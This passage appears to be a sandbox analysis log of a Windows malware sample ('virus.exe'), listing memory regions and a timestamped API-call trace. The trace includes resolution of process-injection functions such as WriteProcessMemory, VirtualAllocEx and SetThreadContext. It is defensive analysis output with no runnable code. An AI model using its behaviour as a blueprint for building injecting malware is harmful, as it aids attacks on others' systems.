"private_0x0000000003b80000" filename = "" Region: id = 457 start_va = 0x3b80000 end_va = 0x3c80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 458 start_va = 0x3b80000 end_va = 0x3c80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 459 start_va = 0x3b80000 end_va = 0x3bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 460 start_va = 0x40e0000 end_va = 0x42dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 461 start_va = 0x7efa7000 end_va = 0x7efa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 462 start_va = 0x742c0000 end_va = 0x7430bfff monitored = 0 entry_point = 0x742c2c14 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 463 start_va = 0x740b0000 end_va = 0x7421efff monitored = 0 entry_point = 0x740bd50e region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\SysWOW64\\ExplorerFrame.dll" (normalized: "c:\\windows\\syswow64\\explorerframe.dll") Region: id = 464 start_va = 0x74260000 end_va = 0x7428efff monitored = 0 entry_point = 0x7426c7a2 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\SysWOW64\\duser.dll" (normalized: "c:\\windows\\syswow64\\duser.dll") Region: id = 465 start_va = 0x73f80000 end_va = 0x74031fff monitored = 0 entry_point = 0x73fd16fd region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\SysWOW64\\dui70.dll" (normalized: "c:\\windows\\syswow64\\dui70.dll") Region: id = 466 start_va = 0x3070000 end_va = 0x3071fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003070000" filename = "" Region: id = 467 start_va = 0x3130000 end_va = 0x314ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003130000" filename = "" Region: id = 468 start_va = 0x3150000 end_va = 0x31d7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003150000" filename = "" Region: id = 469 start_va = 0x3bc0000 end_va = 0x3bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bc0000" filename = "" Region: id = 470 start_va = 0x42e0000 end_va = 0x44dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042e0000" filename = "" Region: id = 471 start_va = 0x7efa4000 end_va = 0x7efa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 472 start_va = 0x74380000 end_va = 0x74396fff monitored = 0 entry_point = 0x74383573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 473 start_va = 0x3c00000 end_va = 0x3c3bfff monitored = 0 entry_point = 0x3c0128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 474 start_va = 0x3c00000 end_va = 0x3c3bfff monitored = 0 entry_point = 0x3c0128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 475 start_va = 0x3c00000 end_va = 0x3c3bfff monitored = 0 entry_point = 0x3c0128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 476 start_va = 0x3c00000 end_va = 0x3c3bfff monitored = 0 entry_point = 0x3c0128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 477 start_va = 0x3c00000 end_va = 0x3c3bfff monitored = 0 entry_point = 0x3c0128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 478 start_va = 0x74340000 end_va = 0x7437afff monitored = 0 entry_point = 0x7434128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 479 start_va = 0x744b0000 end_va = 0x744bdfff monitored = 0 entry_point = 0x744b1235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 480 start_va = 0x3c00000 end_va = 0x3c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 481 start_va = 0x44e0000 end_va = 0x46dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 482 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 483 start_va = 0x3540000 end_va = 0x3551fff monitored = 0 entry_point = 0x3546b95 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll") Region: id = 484 start_va = 0x3090000 end_va = 0x3093fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\SysWOW64\\stdole2.tlb" (normalized: "c:\\windows\\syswow64\\stdole2.tlb") Region: id = 921 start_va = 0x71e70000 end_va = 0x71ebdfff monitored = 0 entry_point = 0x71ea816e region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll") Region: id = 950 start_va = 0x46e0000 end_va = 0x6f64fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046e0000" filename = "" Region: id = 951 start_va = 0x6f70000 end_va = 0x97f4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f70000" filename = "" Region: id = 998 start_va = 0x6f70000 end_va = 0x97f4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f70000" filename = "" Region: id = 1151 start_va = 0x46e0000 end_va = 0x6f64fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046e0000" filename = "" Region: id = 1152 start_va = 0x6f70000 end_va = 0x97f4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f70000" filename = "" Region: id = 1153 start_va = 0x6f70000 end_va = 0x97f4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f70000" filename = "" Thread: id = 1 os_tid = 0xf38 [0053.666] GetVersion () returned 0x1db10106 [0053.666] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0053.668] GetProcAddress (hModule=0x75a80000, lpProcName="IsTNT") returned 0x0 [0053.669] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2890000 [0053.669] VirtualAlloc (lpAddress=0x0, dwSize=0x400000, flAllocationType=0x2000, flProtect=0x4) returned 0x28a0000 [0053.670] VirtualAlloc (lpAddress=0x28a0000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x28a0000 [0053.673] GetCurrentThreadId () returned 0xf38 [0053.673] GetCommandLineA () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe\" " [0053.673] GetEnvironmentStringsW () returned 0xe35908* [0053.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1473, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1473 [0053.674] RtlAllocateHeap (HeapHandle=0x2890000, Flags=0x0, Size=0x5d0) returned 0x28907d0 [0053.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1473, lpMultiByteStr=0x28907d0, cbMultiByte=1473, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1473 [0053.674] FreeEnvironmentStringsW (penv=0xe35908) returned 1 [0053.674] RtlAllocateHeap (HeapHandle=0x2890000, Flags=0x0, Size=0x480) returned 0x2890da8 [0053.674] GetStartupInfoA (in: lpStartupInfo=0x28f9b8 | out: lpStartupInfo=0x28f9b8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0053.674] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0053.674] GetFileType (hFile=0x0) returned 0x0 [0053.675] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0053.675] GetFileType (hFile=0x0) returned 0x0 [0053.675] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0053.675] GetFileType (hFile=0x0) returned 0x0 [0053.675] SetHandleCount (uNumber=0x20) returned 0x20 [0053.675] GetACP () returned 0x4e4 [0053.675] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x28f9e0 | out: lpCPInfo=0x28f9e0) returned 1 [0053.675] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72a4c528, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\2a29d10ec3310613657d8a0dcaa4aabe.virus.exe")) returned 0x45 [0053.679] HeapFree (in: hHeap=0x2890000, dwFlags=0x0, lpMem=0x28907d0 | out: hHeap=0x2890000) returned 1 [0053.679] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x75a80000 [0053.679] GetProcAddress (hModule=0x75a80000, lpProcName="IsProcessorFeaturePresent") returned 0x75a951ed [0053.682] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0053.682] RtlAllocateHeap (HeapHandle=0x2890000, Flags=0x8, Size=0x800) returned 0x2891230 [0053.689] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x98 [0053.689] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x9c [0053.690] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0053.690] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x72a4e6c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll")) returned 0x20 [0053.690] GetVersion () returned 0x1db10106 [0053.690] lstrcmpiW (lpString1="A", lpString2="B") returned -1 [0053.700] GetUserDefaultLCID () returned 0x409 [0053.700] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="A", cchCount1=-1, lpString2="B", cchCount2=-1) returned 1 [0053.700] GetSystemMetrics (nIndex=5) returned 1 [0053.700] GetSystemMetrics (nIndex=6) returned 1 [0053.700] GetSystemMetrics (nIndex=11) returned 32 [0053.700] GetSystemMetrics (nIndex=12) returned 32 [0053.700] GetSystemMetrics (nIndex=34) returned 132 [0053.701] GetSystemMetrics (nIndex=35) returned 38 [0053.701] GetSystemMetrics (nIndex=0) returned 1440 [0053.701] GetSystemMetrics (nIndex=1) returned 900 [0053.701] GetSystemMetrics (nIndex=32) returned 8 [0053.701] GetSystemMetrics (nIndex=33) returned 8 [0053.701] GetSystemMetrics (nIndex=42) returned 0 [0053.701] GetStockObject (i=15) returned 0x188000b [0053.701] GetStockObject (i=7) returned 0x1b00017 [0053.701] GetStockObject (i=6) returned 0x1b00018 [0053.701] GetStockObject (i=8) returned 0x1b00016 [0053.701] GetStockObject (i=4) returned 0x1900011 [0053.701] GetStockObject (i=2) returned 0x1900012 [0053.701] GetStockObject (i=0) returned 0x1900010 [0053.701] GetStockObject (i=5) returned 0x1900015 [0053.701] GetStockObject (i=13) returned 0x18a002e [0053.702] GetDC (hWnd=0x0) returned 0x701020b [0053.702] GetTextExtentPointA (in: hdc=0x701020b, lpString="0", c=1, lpsz=0x28f9dc | out: lpsz=0x28f9dc) returned 1 [0053.707] GetDeviceCaps (hdc=0x701020b, index=14) returned 1 [0053.707] GetDeviceCaps (hdc=0x701020b, index=12) returned 32 [0053.707] GetDeviceCaps (hdc=0x701020b, index=88) returned 96 [0053.707] GetDeviceCaps (hdc=0x701020b, index=90) returned 96 [0053.707] GetDeviceCaps (hdc=0x701020b, index=38) returned 32409 [0053.707] ReleaseDC (hWnd=0x0, hDC=0x701020b) returned 1 [0053.707] HeapCreate (flOptions=0x0, dwInitialSize=0x0, dwMaximumSize=0x0) returned 0x30f0000 [0053.708] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e7d0 | out: ppMalloc=0x72a4e7d0*=0x76da66bc) returned 0x0 [0053.708] GetCurrentThreadId () returned 0xf38 [0054.337] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0054.337] GetProcAddress (hModule=0x75a80000, lpProcName="DeleteCriticalSection") returned 0x77a945f5 [0054.337] GetProcAddress (hModule=0x75a80000, lpProcName="LeaveCriticalSection") returned 0x77a82270 [0054.337] GetProcAddress (hModule=0x75a80000, lpProcName="EnterCriticalSection") returned 0x77a822b0 [0054.337] GetProcAddress (hModule=0x75a80000, lpProcName="InitializeCriticalSection") returned 0x77a92c42 [0054.338] GetProcAddress (hModule=0x75a80000, lpProcName="VirtualFree") returned 0x75a9184e [0054.338] GetProcAddress (hModule=0x75a80000, lpProcName="VirtualAlloc") returned 0x75a91836 [0054.338] GetProcAddress (hModule=0x75a80000, lpProcName="LocalFree") returned 0x75a92cec [0054.338] GetProcAddress (hModule=0x75a80000, lpProcName="LocalAlloc") returned 0x75a9166c [0054.338] GetProcAddress (hModule=0x75a80000, lpProcName="GetTickCount") returned 0x75a9110c [0054.338] GetProcAddress (hModule=0x75a80000, lpProcName="QueryPerformanceCounter") returned 0x75a91705 [0054.338] GetProcAddress (hModule=0x75a80000, lpProcName="GetVersion") returned 0x75a9441f [0054.338] GetProcAddress (hModule=0x75a80000, lpProcName="GetCurrentThreadId") returned 0x75a91430 [0054.339] GetProcAddress (hModule=0x75a80000, lpProcName="InterlockedDecrement") returned 0x75a913d0 [0054.339] GetProcAddress (hModule=0x75a80000, lpProcName="InterlockedIncrement") returned 0x75a913e0 [0054.339] GetProcAddress (hModule=0x75a80000, lpProcName="VirtualQuery") returned 0x75a94412 [0054.339] GetProcAddress (hModule=0x75a80000, lpProcName="WideCharToMultiByte") returned 0x75a916ed [0054.339] GetProcAddress (hModule=0x75a80000, lpProcName="MultiByteToWideChar") returned 0x75a9190e [0054.339] GetProcAddress (hModule=0x75a80000, lpProcName="lstrlenA") returned 0x75a95a03 [0054.339] GetProcAddress (hModule=0x75a80000, lpProcName="lstrcpynA") returned 0x75aa18e2 [0054.340] GetProcAddress (hModule=0x75a80000, lpProcName="LoadLibraryExA") returned 0x75a948cb [0054.340] GetProcAddress (hModule=0x75a80000, lpProcName="GetThreadLocale") returned 0x75a9357f [0054.340] GetProcAddress (hModule=0x75a80000, lpProcName="GetStartupInfoA") returned 0x75a90e00 [0054.340] GetProcAddress (hModule=0x75a80000, lpProcName="GetProcAddress") returned 0x75a91222 [0054.340] GetProcAddress (hModule=0x75a80000, lpProcName="GetModuleHandleA") returned 0x75a91245 [0054.340] GetProcAddress (hModule=0x75a80000, lpProcName="GetModuleFileNameA") returned 0x75a91491 [0054.340] GetProcAddress (hModule=0x75a80000, lpProcName="GetLocaleInfoA") returned 0x75aad5b5 [0054.340] GetProcAddress (hModule=0x75a80000, lpProcName="GetCommandLineA") returned 0x75a95159 [0054.341] GetProcAddress (hModule=0x75a80000, lpProcName="FreeLibrary") returned 0x75a93478 [0054.341] GetProcAddress (hModule=0x75a80000, lpProcName="FindFirstFileA") returned 0x75a9e286 [0054.341] GetProcAddress (hModule=0x75a80000, lpProcName="FindClose") returned 0x75a943fa [0054.341] GetProcAddress (hModule=0x75a80000, lpProcName="ExitProcess") returned 0x75a979c8 [0054.341] GetProcAddress (hModule=0x75a80000, lpProcName="ExitThread") returned 0x77abd598 [0054.341] GetProcAddress (hModule=0x75a80000, lpProcName="CreateThread") returned 0x75a93485 [0054.341] GetProcAddress (hModule=0x75a80000, lpProcName="WriteFile") returned 0x75a91282 [0054.341] GetProcAddress (hModule=0x75a80000, lpProcName="UnhandledExceptionFilter") returned 0x75ab76f7 [0054.342] GetProcAddress (hModule=0x75a80000, lpProcName="RtlUnwind") returned 0x75abd1b3 [0054.342] GetProcAddress (hModule=0x75a80000, lpProcName="RaiseException") returned 0x75a9585e [0054.342] GetProcAddress (hModule=0x75a80000, lpProcName="GetStdHandle") returned 0x75a9516b [0054.342] GetProcAddress (hModule=0x75a80000, lpProcName="TlsSetValue") returned 0x75a914db [0054.342] GetProcAddress (hModule=0x75a80000, lpProcName="TlsGetValue") returned 0x75a911e0 [0054.342] GetProcAddress (hModule=0x75a80000, lpProcName="TlsFree") returned 0x75a93537 [0054.342] GetProcAddress (hModule=0x75a80000, lpProcName="TlsAlloc") returned 0x75a94965 [0054.342] GetProcAddress (hModule=0x75a80000, lpProcName="lstrcpyA") returned 0x75ab2a6d [0054.343] GetProcAddress (hModule=0x75a80000, lpProcName="lstrcmpA") returned 0x75aaecbb [0054.343] GetProcAddress (hModule=0x75a80000, lpProcName="WriteProcessMemory") returned 0x75aad9b0 [0054.343] GetProcAddress (hModule=0x75a80000, lpProcName="WritePrivateProfileStringW") returned 0x75ab63dc [0054.343] GetProcAddress (hModule=0x75a80000, lpProcName="WritePrivateProfileStringA") returned 0x75ab7018 [0054.343] GetProcAddress (hModule=0x75a80000, lpProcName="WaitForSingleObject") returned 0x75a91136 [0054.343] GetProcAddress (hModule=0x75a80000, lpProcName="VirtualUnlock") returned 0x75aaef11 [0054.343] GetProcAddress (hModule=0x75a80000, lpProcName="VirtualProtectEx") returned 0x75b14b5f [0054.343] GetProcAddress (hModule=0x75a80000, lpProcName="VirtualProtect") returned 0x75a94317 [0054.344] GetProcAddress (hModule=0x75a80000, lpProcName="VirtualLock") returned 0x75aaec0b [0054.344] GetProcAddress (hModule=0x75a80000, lpProcName="VirtualAllocEx") returned 0x75aad980 [0054.344] GetProcAddress (hModule=0x75a80000, lpProcName="UnmapViewOfFile") returned 0x75a91806 [0054.344] GetProcAddress (hModule=0x75a80000, lpProcName="TerminateThread") returned 0x75a979e7 [0054.344] GetProcAddress (hModule=0x75a80000, lpProcName="SystemTimeToFileTime") returned 0x75a95a36 [0054.344] GetProcAddress (hModule=0x75a80000, lpProcName="SuspendThread") returned 0x75ab7d46 [0054.344] GetProcAddress (hModule=0x75a80000, lpProcName="Sleep") returned 0x75a910ff [0054.344] GetProcAddress (hModule=0x75a80000, lpProcName="SizeofResource") returned 0x75a95a81 [0054.345] GetProcAddress (hModule=0x75a80000, lpProcName="SetThreadPriority") returned 0x75a9326b [0054.345] GetProcAddress (hModule=0x75a80000, lpProcName="SetThreadLocale") returned 0x75a98991 [0054.345] GetProcAddress (hModule=0x75a80000, lpProcName="SetThreadContext") returned 0x75b15933 [0054.345] GetProcAddress (hModule=0x75a80000, lpProcName="SetLastError") returned 0x75a911a9 [0054.345] GetProcAddress (hModule=0x75a80000, lpProcName="SetFilePointer") returned 0x75a917b1 [0054.345] GetProcAddress (hModule=0x75a80000, lpProcName="SetFileAttributesW") returned 0x75aad4c7 [0054.345] GetProcAddress (hModule=0x75a80000, lpProcName="SetFileAttributesA") returned 0x75aaeca3 [0054.346] GetProcAddress (hModule=0x75a80000, lpProcName="SetEvent") returned 0x75a916a5 [0054.346] GetProcAddress (hModule=0x75a80000, lpProcName="SetErrorMode") returned 0x75a91ae0 [0054.346] GetProcAddress (hModule=0x75a80000, lpProcName="SetEnvironmentVariableW") returned 0x75a989a9 [0054.346] GetProcAddress (hModule=0x75a80000, lpProcName="SetEnvironmentVariableA") returned 0x75a9e2e9 [0054.346] GetProcAddress (hModule=0x75a80000, lpProcName="SetEndOfFile") returned 0x75aace06 [0054.346] GetProcAddress (hModule=0x75a80000, lpProcName="SetCurrentDirectoryW") returned 0x75aa1218 [0054.346] GetProcAddress (hModule=0x75a80000, lpProcName="SetCurrentDirectoryA") returned 0x75aa17ec [0054.346] GetProcAddress (hModule=0x75a80000, lpProcName="ResumeThread") returned 0x75a943a7 [0054.347] GetProcAddress (hModule=0x75a80000, lpProcName="ResetEvent") returned 0x75a916bd [0054.347] GetProcAddress (hModule=0x75a80000, lpProcName="RemoveDirectoryW") returned 0x75b14a6f [0054.347] GetProcAddress (hModule=0x75a80000, lpProcName="RemoveDirectoryA") returned 0x75b14a5f [0054.347] GetProcAddress (hModule=0x75a80000, lpProcName="ReadProcessMemory") returned 0x75aacfa4 [0054.347] GetProcAddress (hModule=0x75a80000, lpProcName="ReadFile") returned 0x75a93e83 [0054.347] GetProcAddress (hModule=0x75a80000, lpProcName="QueryDosDeviceW") returned 0x75abcedc [0054.347] GetProcAddress (hModule=0x75a80000, lpProcName="PostQueuedCompletionStatus") returned 0x75aaeef9 [0054.347] GetProcAddress (hModule=0x75a80000, lpProcName="OpenProcess") returned 0x75a91966 [0054.348] GetProcAddress (hModule=0x75a80000, lpProcName="MulDiv") returned 0x75a91b30 [0054.348] GetProcAddress (hModule=0x75a80000, lpProcName="MapViewOfFileEx") returned 0x75a94c3b [0054.348] GetProcAddress (hModule=0x75a80000, lpProcName="MapViewOfFile") returned 0x75a918d1 [0054.348] GetProcAddress (hModule=0x75a80000, lpProcName="LockResource") returned 0x75a95911 [0054.348] GetProcAddress (hModule=0x75a80000, lpProcName="LoadResource") returned 0x75a95904 [0054.348] GetProcAddress (hModule=0x75a80000, lpProcName="LoadLibraryExW") returned 0x75a94915 [0054.348] GetProcAddress (hModule=0x75a80000, lpProcName="LoadLibraryW") returned 0x75a948e3 [0054.348] GetProcAddress (hModule=0x75a80000, lpProcName="LoadLibraryA") returned 0x75a9498f [0054.349] GetProcAddress (hModule=0x75a80000, lpProcName="IsBadWritePtr") returned 0x75abd1dc [0054.349] GetProcAddress (hModule=0x75a80000, lpProcName="IsBadStringPtrW") returned 0x75ab3058 [0054.349] GetProcAddress (hModule=0x75a80000, lpProcName="IsBadReadPtr") returned 0x75abd065 [0054.349] GetProcAddress (hModule=0x75a80000, lpProcName="HeapDestroy") returned 0x75a93567 [0054.349] GetProcAddress (hModule=0x75a80000, lpProcName="HeapCreate") returned 0x75a949e5 [0054.349] GetProcAddress (hModule=0x75a80000, lpProcName="HeapAlloc") returned 0x77a8e026 [0054.349] GetProcAddress (hModule=0x75a80000, lpProcName="GlobalUnlock") returned 0x75aacfb4 [0054.349] GetProcAddress (hModule=0x75a80000, lpProcName="GlobalReAlloc") returned 0x75aae48e [0054.350] GetProcAddress (hModule=0x75a80000, lpProcName="GlobalHandle") returned 0x75abd26c [0054.350] GetProcAddress (hModule=0x75a80000, lpProcName="GlobalLock") returned 0x75aad077 [0054.350] GetProcAddress (hModule=0x75a80000, lpProcName="GlobalFree") returned 0x75a95510 [0054.350] GetProcAddress (hModule=0x75a80000, lpProcName="GlobalFindAtomA") returned 0x75abd348 [0054.350] GetProcAddress (hModule=0x75a80000, lpProcName="GlobalDeleteAtom") returned 0x75aacd85 [0054.350] GetProcAddress (hModule=0x75a80000, lpProcName="GlobalAlloc") returned 0x75a95846 [0054.350] GetProcAddress (hModule=0x75a80000, lpProcName="GlobalAddAtomA") returned 0x75ab04f6 [0054.352] GetProcAddress (hModule=0x75a80000, lpProcName="GetWindowsDirectoryW") returned 0x75a9439a [0054.352] GetProcAddress (hModule=0x75a80000, lpProcName="GetWindowsDirectoryA") returned 0x75ab2ada [0054.352] GetProcAddress (hModule=0x75a80000, lpProcName="GetVolumeInformationW") returned 0x75aac838 [0054.352] GetProcAddress (hModule=0x75a80000, lpProcName="GetVolumeInformationA") returned 0x75ab6d9b [0054.352] GetProcAddress (hModule=0x75a80000, lpProcName="GetVersionExA") returned 0x75a934c9 [0054.353] GetProcAddress (hModule=0x75a80000, lpProcName="GetTimeZoneInformation") returned 0x75a94612 [0054.353] GetProcAddress (hModule=0x75a80000, lpProcName="GetThreadPriority") returned 0x75a94377 [0054.353] GetProcAddress (hModule=0x75a80000, lpProcName="GetThreadContext") returned 0x75ab799c [0054.353] GetProcAddress (hModule=0x75a80000, lpProcName="GetTempPathW") returned 0x75aad4ac [0054.353] GetProcAddress (hModule=0x75a80000, lpProcName="GetTempPathA") returned 0x75ab273c [0054.353] GetProcAddress (hModule=0x75a80000, lpProcName="GetTempFileNameW") returned 0x75abd1a6 [0054.353] GetProcAddress (hModule=0x75a80000, lpProcName="GetTempFileNameA") returned 0x75ab9d0f [0054.353] GetProcAddress (hModule=0x75a80000, lpProcName="GetSystemInfo") returned 0x75a94982 [0054.354] GetProcAddress (hModule=0x75a80000, lpProcName="GetSystemDirectoryW") returned 0x75a9501b [0054.354] GetProcAddress (hModule=0x75a80000, lpProcName="GetSystemDirectoryA") returned 0x75aab644 [0054.354] GetProcAddress (hModule=0x75a80000, lpProcName="GetStringTypeExW") returned 0x75a9553e [0054.354] GetProcAddress (hModule=0x75a80000, lpProcName="GetStringTypeExA") returned 0x75ab822e [0054.354] GetProcAddress (hModule=0x75a80000, lpProcName="GetPrivateProfileStringW") returned 0x75a9ea00 [0054.354] GetProcAddress (hModule=0x75a80000, lpProcName="GetPrivateProfileStringA") returned 0x75aa1804 [0054.354] GetProcAddress (hModule=0x75a80000, lpProcName="GetModuleHandleW") returned 0x75a93460 [0054.354] GetProcAddress (hModule=0x75a80000, lpProcName="GetModuleFileNameW") returned 0x75a94908 [0054.355] GetProcAddress (hModule=0x75a80000, lpProcName="GetLogicalDriveStringsW") returned 0x75b1490f [0054.355] GetProcAddress (hModule=0x75a80000, lpProcName="GetLocaleInfoW") returned 0x75a93bf2 [0054.355] GetProcAddress (hModule=0x75a80000, lpProcName="GetLocalTime") returned 0x75a95a5e [0054.355] GetProcAddress (hModule=0x75a80000, lpProcName="GetLastError") returned 0x75a911c0 [0054.355] GetProcAddress (hModule=0x75a80000, lpProcName="GetFullPathNameW") returned 0x75a9408c [0054.355] GetProcAddress (hModule=0x75a80000, lpProcName="GetFullPathNameA") returned 0x75a9e279 [0054.355] GetProcAddress (hModule=0x75a80000, lpProcName="GetFileSize") returned 0x75a9194e [0054.355] GetProcAddress (hModule=0x75a80000, lpProcName="GetFileAttributesExW") returned 0x75a9452c [0054.356] GetProcAddress (hModule=0x75a80000, lpProcName="GetFileAttributesExA") returned 0x75abcc04 [0054.356] GetProcAddress (hModule=0x75a80000, lpProcName="GetFileAttributesW") returned 0x75a91af8 [0054.356] GetProcAddress (hModule=0x75a80000, lpProcName="GetFileAttributesA") returned 0x75a953cc [0054.356] GetProcAddress (hModule=0x75a80000, lpProcName="GetExitCodeThread") returned 0x75aad585 [0054.356] GetProcAddress (hModule=0x75a80000, lpProcName="GetDriveTypeA") returned 0x75aaef45 [0054.356] GetProcAddress (hModule=0x75a80000, lpProcName="GetDiskFreeSpaceA") returned 0x75b148df [0054.356] GetProcAddress (hModule=0x75a80000, lpProcName="GetDateFormatA") returned 0x75aba939 [0054.356] GetProcAddress (hModule=0x75a80000, lpProcName="GetCurrentThread") returned 0x75a917cc [0054.357] GetProcAddress (hModule=0x75a80000, lpProcName="GetCurrentProcessId") returned 0x75a911f8 [0054.357] GetProcAddress (hModule=0x75a80000, lpProcName="GetCurrentProcess") returned 0x75a917e9 [0054.357] GetProcAddress (hModule=0x75a80000, lpProcName="GetCurrentDirectoryW") returned 0x75a955c9 [0054.357] GetProcAddress (hModule=0x75a80000, lpProcName="GetCurrentDirectoryA") returned 0x75abd4e6 [0054.357] GetProcAddress (hModule=0x75a80000, lpProcName="GetComputerNameW") returned 0x75a9dcc6 [0054.357] GetProcAddress (hModule=0x75a80000, lpProcName="GetComputerNameA") returned 0x75aab6b8 [0054.357] GetProcAddress (hModule=0x75a80000, lpProcName="GetCommandLineW") returned 0x75a951db [0054.358] GetProcAddress (hModule=0x75a80000, lpProcName="GetCPInfo") returned 0x75a95141 [0054.358] GetProcAddress (hModule=0x75a80000, lpProcName="GetACP") returned 0x75a9177c [0054.358] GetProcAddress (hModule=0x75a80000, lpProcName="FreeResource") returned 0x75aad3ab [0054.358] GetProcAddress (hModule=0x75a80000, lpProcName="InterlockedExchange") returned 0x75a91442 [0054.358] GetProcAddress (hModule=0x75a80000, lpProcName="FormatMessageW") returned 0x75a945d8 [0054.358] GetProcAddress (hModule=0x75a80000, lpProcName="FormatMessageA") returned 0x75ab5f8d [0054.358] GetProcAddress (hModule=0x75a80000, lpProcName="FlushInstructionCache") returned 0x75a9434b [0054.358] GetProcAddress (hModule=0x75a80000, lpProcName="FlushFileBuffers") returned 0x75a94653 [0054.359] GetProcAddress (hModule=0x75a80000, lpProcName="FindResourceW") returned 0x75a95929 [0054.359] GetProcAddress (hModule=0x75a80000, 